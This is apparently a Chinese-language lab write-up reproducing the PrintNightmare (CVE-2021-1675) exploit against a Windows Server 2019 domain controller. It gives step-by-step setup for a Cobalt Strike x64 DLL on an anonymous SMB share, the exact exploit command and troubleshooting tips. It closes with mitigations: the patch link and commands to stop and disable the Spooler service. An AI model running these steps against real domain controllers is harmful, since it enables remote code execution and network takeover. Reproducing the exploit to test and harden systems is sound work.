复现漏洞利用的Windows版本是Windows Server 2019 Version 1809,使用了 https://github.com/cube0x0/CVE-2021-1675 项目的python版本exp。
经过反复测试后,发现远程命令执行需要满足一些条件:
首先在域控上添加一个普通域用户,设置用户名和密码
因为spoolsv.exe是x64的,所以我们这里Cobalt Strike也生成x64的dll
按照 https://github.com/cube0x0/CVE-2021-1675 的smb设置方法,在域内一台主机上提供匿名访问权限的共享文件
在域内的其他主机上放置好生成的artifact.dll,设置分享目录并允许匿名访问,在域控上必须能直接获取到文件
使用exp,参数分别是刚才创建的新域用户的用户名和密码,还有DC的ip,最后是smb共享文件的路径
python CVE-2021-1675.py testUser:[email protected] \\192.168.92.130\share\artifact.dll
这里会遇到一些坑,如果报错 Error: code: 0x5 - rpc_s_access_denied 说明smb还不能匿名访问,如果连续执行成功,但是只复制了dll并未执行,可能是验证用户不是普通域用户账号。
使用Procmon发现测试用的 artifact.dll 已经被spoolsv.exe加载:
上线成功
安装微软 CVE-2021-1675 漏洞补丁
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
关闭打印机服务
Stop-Service Spooler
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\Spooler" /v "Start " /t REG_DWORD /d "4" /f